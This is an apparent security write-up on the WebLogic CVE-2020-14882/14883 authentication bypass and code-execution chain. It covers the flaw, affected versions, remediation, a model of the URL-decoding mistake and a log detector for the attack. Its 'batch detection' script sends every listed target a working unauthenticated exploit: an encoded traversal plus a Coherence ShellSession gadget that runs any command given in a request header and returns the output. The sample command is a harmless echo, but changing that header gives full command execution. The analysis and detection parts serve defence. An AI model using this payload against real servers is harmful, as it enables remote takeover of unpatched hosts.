    3.24 KB / 2021-05-21 09:14:38
# CVE-2020-14882: WebLogic authentication-bypass RCE, batch detection
    
    
Vulnerability details

An unauthenticated remote attacker can send a specially crafted HTTP GET request and, by chaining it with CVE-2020-14883, take over the WebLogic Server Administration Console without any credentials and execute arbitrary code. CVE-2020-14882 is the authentication bypass (a double-URL-encoded `..` in a path under `/console/images/` reaches console pages that are otherwise protected by the login); CVE-2020-14883 is the post-authentication flaw in which a `handle` parameter is instantiated as an arbitrary class, which is what turns console access into code execution. The bar to exploitation is low and the severity is critical.
    
Affected versions

Oracle WebLogic Server 10.3.6.0, 12.1.3.0, 12.2.1.3, 12.2.1.4 and 14.1.1.0.

Note that the `com.tangosol.coherence.mvel2.sh.ShellSession` gadget used by the detection script below depends on the Coherence library that ships with 12.2.1.x and 14.1.1.0; the older 10.3.6 and 12.1.3 branches need a different CVE-2020-14883 gadget, so a miss from this script against those versions does not prove the host is patched.
    
Vulnerable path

/console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29

`%252E%252E%252F` is `../` URL-encoded twice: after the first decode it is still `%2E%2E%2F`, so the request looks like a static resource under `/console/images/` (served without login), but once fully decoded and normalised it resolves to `/console/console.portal`, the authenticated console. A request for this path that returns the console page (HTTP 200, console HTML rather than a redirect to `LoginForm.jsp`) is sufficient evidence of CVE-2020-14882 on its own, without executing any command.
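To make the bypass concrete, here is an added Python model of the decode/normalise ordering mistake behind CVE-2020-14882. It is illustrative code written for this page, not WebLogic's own implementation: a pre-authentication filter decodes the URI once and exempts everything under `/console/images/`, while the resource that is eventually served is resolved after the remaining encoding is decoded and `..` is normalised. The hardened variant canonicalises to a fixed point before the prefix test and rejects any `..` segment. Path strings and function names are assumptions.

```python
import posixpath
from urllib.parse import unquote

# Constructed request paths for illustration (not captured traffic).
STATIC_IMAGE = "/console/images/logo.gif"
CONSOLE_DIRECT = "/console/console.portal"
BYPASS_PATH = "/console/images/%252E%252E%252Fconsole.portal"


def fully_decode(path: str, rounds: int = 5) -> str:
    """Percent-decode until the string stops changing (bounded to 'rounds')."""
    for _ in range(rounds):
        nxt = unquote(path)
        if nxt == path:
            break
        path = nxt
    return path


def flawed_skips_auth(path: str) -> bool:
    """Model of the broken ordering: decode the raw request URI once, then
    exempt everything under /console/images/ from the login check."""
    decoded_once = unquote(path)        # %252E%252E%252F -> %2E%2E%2F
    return decoded_once.startswith("/console/images/")


def dispatched_resource(path: str) -> str:
    """Model of the resource the console actually serves: the remaining
    encoding is decoded and '..' segments are resolved."""
    return posixpath.normpath(fully_decode(path))


def hardened_skips_auth(path: str) -> bool:
    """Fix: decode to a fixed point and canonicalise before the prefix test,
    and refuse any request that still carries a '..' segment."""
    decoded = fully_decode(path)
    if ".." in decoded.split("/"):
        return False
    return posixpath.normpath(decoded).startswith("/console/images/")


def compare(path: str) -> dict:
    """Side-by-side result for one request path."""
    return {
        "flawed_skips_auth": flawed_skips_auth(path),
        "dispatched_to": dispatched_resource(path),
        "hardened_skips_auth": hardened_skips_auth(path),
    }


if __name__ == "__main__":
    for p in (STATIC_IMAGE, CONSOLE_DIRECT, BYPASS_PATH):
        print(p, compare(p))
```

The flawed check lets `BYPASS_PATH` through because it still sees `%2E%2E%2F`, yet the request is dispatched to `/console/console.portal`; the hardened check sees the same canonical path the dispatcher does and denies it, while a genuine image under `/console/images/` is still exempt.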
    
Remediation

Install Oracle's official patch; the fix for CVE-2020-14882 and CVE-2020-14883 shipped in the October 2020 Critical Patch Update:

https://www.oracle.com/security-alerts/cpuoct2020.html

If patching has to wait, restrict access to the `/console` path to trusted administrative networks (or disable the Administration Console altogether); an Internet-reachable console is what makes this chain exploitable.
    
Batch detection

Note: in accordance with the Cybersecurity Law, only the core code is given. One pitfall hit during debugging: the server returned a response that could not be parsed, which was solved by setting `_http_vsn_str` in Python 3's `http.client` so that the request is sent in HTTP/1.0 format.
    
    
```python
import http.client
import sys

import requests
import urllib3

# Speak HTTP/1.0: during testing the server could not parse the request when
# it was sent as HTTP/1.1. requests is built on urllib3, which subclasses
# http.client.HTTPConnection, so patching the class attributes affects it too.
http.client.HTTPConnection._http_vsn = 10
http.client.HTTPConnection._http_vsn_str = 'HTTP/1.0'
urllib3.disable_warnings()   # verify=False below would otherwise warn per request

# The MVEL payload reads the command from the 'cmd' header and writes its
# output into the response body; 'echo 666' is a harmless marker.
headers = {'Connection': 'close',
           'cmd': 'echo 666'}

# CVE-2020-14882 traversal (%25%32%65 = double-encoded '.') to reach
# consolejndi.portal without authentication, plus CVE-2020-14883 handle
# constructor injection using the Coherence MVEL ShellSession gadget.
payloads = [r"""/console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('weblogic.work.ExecuteThread currentThread = (weblogic.work.ExecuteThread)Thread.currentThread(); weblogic.work.WorkAdapter adapter = currentThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler");field.setAccessible(true);Object obj = field.get(adapter);weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl)obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd");String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd};if(cmd != null ){ String result = new java.util.Scanner(new java.lang.ProcessBuilder(cmds).start().getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl)req.getClass().getMethod("getResponse").invoke(req);res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result));res.getServletOutputStream().flush();} currentThread.interrupt();')"""]

path_out = 'vuln.txt'   # confirmed targets are appended here


def http_request(url, left=0, countLines=0):
    """Probe one base URL (e.g. http://host:7001); returns True if vulnerable."""
    try:
        print("Trying:" + url + ' ' + '[' + str(left) + '/' + str(countLines) + ']')
        for payload in payloads:
            try:
                vulurl = url + payload
                print(vulurl)
                r = requests.get(url=vulurl, headers=headers, timeout=10, verify=False)
                # The marker only shows up in the body if the command actually ran.
                if r.status_code == 200 and '666' in r.text:
                    print("\033[1;40;32m[Vuln] {}\033[0m".format(vulurl))
                    print(r.text)
                    with open(path_out, 'a') as f:
                        f.write(vulurl + '\n')
                    return True
                print("[-]" + "r.status_code:" + str(r.status_code) + "," + "r.text:" + r.text)
            except Exception as err:
                print(err)
    except Exception as err:
        print(err)
    return False


if __name__ == '__main__':
    # usage: python3 check.py targets.txt   (one base URL per line)
    with open(sys.argv[1]) as f:
        targets = [line.strip() for line in f if line.strip()]
    countLines = len(targets)
    for left, url in enumerate(targets, 1):
        http_request(url, left, countLines)
```
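As an added blue-team counterpart to the scanner (written for this page, not taken from the original), the following Python runs over a few constructed common-log-format access-log lines, decodes each request target to a fixed point so that `%252E`, `%25%32%65` and a plain `..` all collapse to the same string, and flags the three indicators this page's own requests exhibit: a decoded `..` traversal under `/console/`, a `handle`/`test_handle` parameter whose value is a constructor call, and the Coherence `ShellSession` class. The log lines, field layout and indicator labels are assumptions.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines in common log format (not real traffic). Line 2
# is the CVE-2020-14882 bypass URL from this page; line 3 mirrors the scanner's
# consolejndi.portal request with a shorter MVEL expression.
SAMPLE_LOG = """\
10.0.0.5 - - [21/May/2021:09:14:38 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 4521
10.0.0.9 - - [21/May/2021:09:15:02 +0800] "GET /console/images/%252E%252E%252Fconsole.portal?_nfpb=true&_pageLabel=AppDeploymentsControlPage&handle=com.bea.console.handles.JMXHandle%28%22com.bea%3AName%3Dbase_domain%2CType%3DDomain%22%29 HTTP/1.0" 200 12890
10.0.0.9 - - [21/May/2021:09:15:03 +0800] "GET /console/css/%25%32%65%25%32%65%25%32%66consolejndi.portal?test_handle=com.tangosol.coherence.mvel2.sh.ShellSession('java.lang.Runtime.getRuntime().exec("id")') HTTP/1.0" 200 3
10.0.0.7 - - [21/May/2021:09:16:10 +0800] "GET /console/images/logo.gif HTTP/1.1" 200 1034
"""

# ip ident user [timestamp] "METHOD target PROTO" status ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)
# CVE-2020-14883 shape: a handle/test_handle parameter whose value is Class(...)
HANDLE_RE = re.compile(r"(?:^|&)(?:test_)?handle=[a-z0-9_.]+\(")


def fully_decode(s: str, rounds: int = 5) -> str:
    """Percent-decode until stable, so layered encodings cannot hide '..'."""
    for _ in range(rounds):
        nxt = unquote(s)
        if nxt == s:
            break
        s = nxt
    return s


def indicators(target: str) -> list:
    """Return the list of indicator labels found in one request target."""
    decoded = fully_decode(target).lower()
    path, _, query = decoded.partition("?")
    found = []
    if path.startswith("/console/") and "/../" in path:
        found.append("encoded traversal under /console (CVE-2020-14882 auth bypass)")
    if HANDLE_RE.search(query):
        found.append("handle constructor injection (CVE-2020-14883)")
    if "com.tangosol.coherence.mvel2.sh.shellsession" in query:
        found.append("mvel ShellSession gadget (command execution)")
    return found


def scan_log(text: str) -> list:
    """Parse each line and keep those with at least one indicator."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        found = indicators(m.group("target"))
        if found:
            hits.append({"ip": m.group("ip"), "ts": m.group("ts"),
                         "status": int(m.group("status")),
                         "target": m.group("target"), "indicators": found})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ts"], hit["ip"], hit["status"], "; ".join(hit["indicators"]))
```

A hit with a 200 status on the traversal alone already means the console was reached without login; a hit that also carries the `ShellSession` indicator means a command-execution payload was delivered and the host should be treated as compromised until proven otherwise. Decoding before matching is what keeps the rule from being bypassed by choosing a different number of encoding layers.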
    
    via:六六
    